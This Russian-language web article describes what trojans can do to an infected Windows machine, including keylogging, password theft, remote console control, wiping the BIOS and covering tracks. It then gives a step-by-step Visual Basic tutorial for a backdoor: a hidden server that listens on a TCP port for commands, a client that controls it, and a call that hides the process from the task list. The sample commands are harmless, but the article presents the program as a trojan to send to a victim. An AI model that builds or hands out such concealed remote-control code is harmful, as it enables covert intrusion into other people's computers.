| Главная » Статьи » Разное |
О троянах (с комментариями и поправлениями)
| Данная статья написана в целях ознакомления! Автор ответственности не несёт! Сначала о системе Windows.. В любой вещи есть "черное" и "белое" Чем хороша ОС Windows?Она довольно проста в установке, настройке и использовании , оптимизирована для игр и работы в офисе(например)..Так выглядит Масдай на взгляд простого юзверя... Теперь темные стороны этой ОС. Что можно сказать об её стабильности?.. Довольно таки мало т.к. в целом система не самая устойчивая и стабильная.Не так мало шансов потерять очень важную информацию. "Но самое важное, что операционная система WINDOWS буквально оптимизирована для взлома... " (На самом деле нет) "Действительно, Microsoft не потрудилась применить криптостойкие алгоритмы защиты (частный случай). Что было сделано, чтоб спрятать те же самые пароли? Всего лишь то, чтоб их нельзя было увидеть, нажав F3 в Нортон Коммандере. Это помогло бы только против самых что ни на есть "псевдо" хакеров. (Даже нечем похвалиться, если бы вас так подломали). Но создатели WINDOWS решили не утруждать себя и закодировали все пароли в системе некриптостойкими алгоритмами, в частности за"XOR"иванием (что?). Такое кодирование вскрывается за доли секунды, в отличие от метода кодирования паролей в UNIX-системах, где вскрыть пароль можно только прямым перебором, да и то при достаточно большой вычислительной можности перебор всех вариантов одного пароля займет в среднем 12 тысяч лет. - подумай кстати о выборе ОС" (а я уж думал, что у нас тута фулл-масдаеблядь) Существует такой изощренный способ атак, что большинство людей перед ними бессильны. Что это? Можно сказать одним словом - ТРОЯНЫ (УЖОС!). А ТЕПЕРЬ О ТОМ, ЧТО МОЖЕТ ДЕЛАТЬ ТРОЯН. "Перехват клавиатуры. Вот он, ваш парольчик-то... Кража закешированных паролей (тех, что "запоминаются" системой). Вот все пароли сразу... Сбор информации о системе (какой логин, сколько памяти, диски, принтеры...) Получение копии вашего экрана. Без комментариев (Действительно). Запрещение нажатий определенных клавиш на клавиатуре. (Издевательство (Безобразие!)) Поменять кнопки мышки местами. (Тоже издевательство.) Контроль координат курсора мыши (ой, мышка сама ездит???) Открыть/закрыть CD-ROM. (Оооочень забавно...) Или вообще блокировать кнопку "Eject" на нем... (CD-ROM сломался!!!) Перенаправление консоли (то есть как telnet, только например, command.com запустился у вас, а на экран он вышел не у вас... А тот человек набрал команду "format c:" и нажал "y"...) Перенаправление портов. Это еще серьезней. Злоумышленник будет ломать банк, Белый Дом, спутники... А ФБР или ФСБ почему-то придет к вам... То есть, сигнал пойдет от злоумышленника через ваш компьютер, и везде засветится именно ваш IP-адрес... Узнать, какие программы у вас запущены. Закрыть парочку этих программ (например, пасьянс у секретарши или Word у профессора...) Запустить программу (вот вам калькулятор, считайте на здоровье. Или еще один, новый троян, которого антивирусы не видят.) Вывести на экран картинку (порно, в то время, когда у начальника важный посетитель.) Показать/убрать панель задач (вот весело-то, кнопки Пуск нет... часов нет...) Выключить или перезагрузить компьютер. (Без комментариев.) Отключить компьютер от Интернета. (Пусть перезагружается, чтоб снова работать) Если у вас подключен микрофон, то можно услышать вас. Если у вас есть Web-Camera, то можно и увидеть вас. Если у вас слишком громко играет музыка, то можно ее вам убавить. Или наоборот, проиграть на вашей машине звуковой файл... А можно и документ на вашем принтере напечатать. Можно подредактировать ваш реестр. Там хранятся ВСЕ настройки... Что "настройщику" придет в голову, неизвестно. Можно диалоговые окошки выводить. Вот такие, например... Иногда полезно бывает открыть вам броузер и "послать" вас например, на www.fuck.ru. Вам должно понравиться. Особенно если вы человек высокой морали. Можно вывести окошко, в котором вы обычно набираете пароль... 90 %, что вы наберете его. Это может быть пароль от почты, от ICQ или еще от чего-нибудь. Последствия известны... Можно посмотреть, что вы там через буфер обмена носите. А может, там пароль??? В конце концов, можно стереть у вас содержимое Flash-BIOS. Последствия будут, как от вируса "Чернобыль" (Win.CIH). Можно с машины-жертвы просканировать порты, например, на сервере... Вот админ сервера удивится, когда начальник, ничего в этом не понимающий, засветит свой IP в логах... Можно переименовать заголовки окон, например, "WinWord" в "Привет от Васи Пупкина"... Человек будет в трансе... Можно текст вам переслать, как будто вы его сами на клавиатуре набрали. (Клавиатура с ума сошла!!!) Время на компьютере изменить - тоже не проблема. Особенно опасным может быть такая комбинация: закачать вам на диск вирус "Чернобыль" (Win.Cih), изменить время на 26 апреля, запустить этот файл, с полчасика подождать и перезагрузить вас. Ваш компьютер может посылать каждый раз при включении почту злоумышленнику, сообщая о времени включения и о других параметрах. А также в некоторых троянах есть функция самоликвидирования, то есть при грамотном использовании их можно нанести очень большой урон и замести практически все следы деятельности, так что доказательств не останется. Вот такие пироги... Это далеко не полный список. Это всего лишь то, что я вспомнил "с лету". Подытоживая все это, хочу сказать, что контроль над компьютером таким образом осуществляется АБСОЛЮТНО ПОЛНЫЙ. Насколько полный - зависит от конкретного трояна и от фантазии его создателей. Прогресс идет... " А ВОТ СОБСТВЕННО "ТЕЛО" ТРОЯНА - С ОПИСАНИЕМ СОЗДАНИЯ... примечание:для создания необходим Visual Basic!!! Создание троянаразнообразные трояны и вирусы. Но о большинстве из них (скорее всего) уже знают антивирусные программы. К тому же надо с опаской относиться к таким троянам, которые отсылают пароли на e-mail, т.к. их большинство дублирует письмо на e-mail автора :о) Поэтому лучше всего сделать троян самому. Для начала разберёмся с классификацией троянов. Трояны делятся на несколько категорий: BackDoors, Nukers и т.д. В этой статье мы будим говорить о создании собственного BackDoor'а, а точнее программы скрытого удалённого администрирования. Такие программы состоят из 2-х частей: одна - сервер, а другая - клиент. На компьютер жертвы засылается сервер. Именно он скрывается от пользователя. Файл сервера при запуске автоматически копируется в каталог Windows или системный каталог, а также скрывается из диалога "Завершение работы программы", который вызывается нажатием Ctrl+Alt+Delete. Во время работы, сервер открывает какой-нибудь порт от 1-ого до 65535-ого, и ждёт там клиента. Оыбчно сервер открывает порт на TCP протоколе. После того, как клиент подключиться к серверной части, он начинает посылать ей команды. Командами являются просто сочетания символов, обычно в виде слов, чтобы автору трояна не мучиться :о) Какие именно он придумает команды - нужно только догадоваться. Итак. Как мы и обещали, приступаем к созданию программы. Сначала напишем сервер. Для этого создаём новый проект на Visual Basic в виде стандартного EXE. Далее подключаем к нему Microsoft Winsock Control: в меню "Project"->"Components..." Если в списке его нет, то нажмите "Browse" и выберете файл "mswinsck.ocx". Тепрь ставим на форму этот компонент. Он нам нужен для свази клиентской и серверной части по TCP протоколу. Далее изменяем форму: убираем заголовок, делаем малые размеры и visible формы ставим на False. У компонента меняем имя на "ws" и свойству LocalPort присваиваем число, которое и будет номером порта, например 123. Теперь попробуем запустить программу. У вас ничего не должно появиться. Завершаем работу программы нажатием кнопки "стоп". Начинаем писать код программы. В Form_Load пишем: Private Sub Form_Load() Do If ws.State sckConnected And ws.State sckListening Then ws.Close ws.Listen End If DoEvents Loop End Sub Здесь, если мы ни с кем не соеденины и не прослушиваем порт, закрываем связь в ws и открываем 123 порт в ожидании клиента. Условие на состояние связи в ws нужно повторять во время работы программы для того, чтобы избежать случая, который возникает при разрыве связи. Т.е. вы начинаете случать порт, затем подключается удалённый компьютер, а после его отключения порт слушаться уже не будет. Вот значения, которые может принимать свойство State: Константа Значение Описание sckClosed 0 Такое значение стоит при запуске программы или когда порт закрыт sckOpen 1 Порт открыт sckListening 2 Порт прослушивается sckConnectionPending 3 Connection pending sckResolvingHost 4 Resolving host sckHostResolved 5 Host resolved sckConnecting 6 Подключение к хосту sckConnected 7 Связь установлена sckClosing 8 Связь закрывается... sckError 9 Ошибка Теперь нужно подключить клиента. Для этого в ws_ConnectionRequest, т.е. в запросе на соединение пишем: Private Sub ws_ConnectionRequest(ByVal requestID As Long) ws.Close ws.Accept requestID End Sub Здесь мы сначала прекрашаем слушать, а затем подсоединяем клиента по номеру его запроса. На этом код по соединению двух программ закончен. Далее разбираем код для ws_DataArrival. Он будет вызываться, когда будут приходить какие-нибудь данные от сервера. Private Sub ws_DataArrival(ByVal bytesTotal As Long) Dim Data As String ws.GetData Data Select Case Data Case "BEEP" Beep Case "MSG" MsgBox "Привет!", vbInformation, ":o)" Case "END" End End Select End Sub В этом коде тоже всё просто. Сначала объявляем переменную Data, которая будет содержать пришедшие данные, а затем записываем их. После этого просматриваем все возможные варианты, т.е. команды, которые могли прийти от сервера. Здесь их три: BEEP, MSG, END. То, что они делают, думаю, объеснять не надо. Теперь остаётся скомпилировать программу. Назовём её "server.exe". Приступим к написанию клиентской части. Создадим новый проект и форму, как на рисунке: Поставьте на форму 2 текстовых поля и назовите их "IP" и "Port", затем две кнопки с надписями "Подключиться" и "Отключиться", и 3 кнопки с надписями "Бип!", "Сообщение" и "Закрыть сервер". Имена кнопок оставьте стандартными. Теперь добавьте Winsock Control и назовите его "ws". Поскольку наш сервер работает на 123 порту, то свойству Text второго текстового поля можно сразу присвоить значение "123". Текст первого поля будет значение IP адреса данного компьютера. Для этого пишем: Private Sub Form_Load() IP.Text = ws.LocalIP End Sub Теперь запущенная программа может выглядеть примерно так: Продолжаем писать код. Private Sub Command1_Click() ws.Close ws.RemoteHost = IP ws.RemotePort = Port ws.Connect End Sub Private Sub Command2_Click() ws.Close End Sub При нажатии на кнопку "Подключиться", мы закрываем связь, указываем удалённый IP и порт и подключаемся. Кнопка "Отключиться" просто закрывает связь. Private Sub Command3_Click() If ws.State sckConnected Then Exit Sub ws.SendData "BEEP" End Sub Private Sub Command4_Click() If ws.State sckConnected Then Exit Sub ws.SendData "MSG" End Sub Private Sub Command5_Click() If ws.State sckConnected Then Exit Sub ws.SendData "END" End Sub В последних трёх кнопках программа сначала проверяет связь, и, если соединено, то посылает команду. Теперь компилируем программу в "client.exe". Можно протестировать троян. Для этого запустите "server.exe", а затем "client.exe" и попробуйте подключиться. Если не было ошибок, то понажимайте на кнопки команд. Теперь сервер можно закрыть из списка задач (Ctrl+Alt+Delete). Вот в принципе и всё. Если вы хотите скрыть своего трояна из списка задач, то в объявлениях формы сервера подключите функцию RegisterServiceProcess, а также измените Form_Load: Private Declare Function RegisterServiceProcess Lib _ "kernel32.dll" (ByVal dwProcessId As Long, ByVal _ dwType As Long) As Long Private Sub Form_Load() RegisterServiceProcess 0, 1 Do If ws.State sckConnected And ws.State sckListening Then ws.Close ws.Listen End If DoEvents Loop End Sub | |
| Категория: Разное | Добавил: Borsh_Adept (01.03.2016) | |
| Просмотров: 971 | |
| Всего комментариев: 0 | |
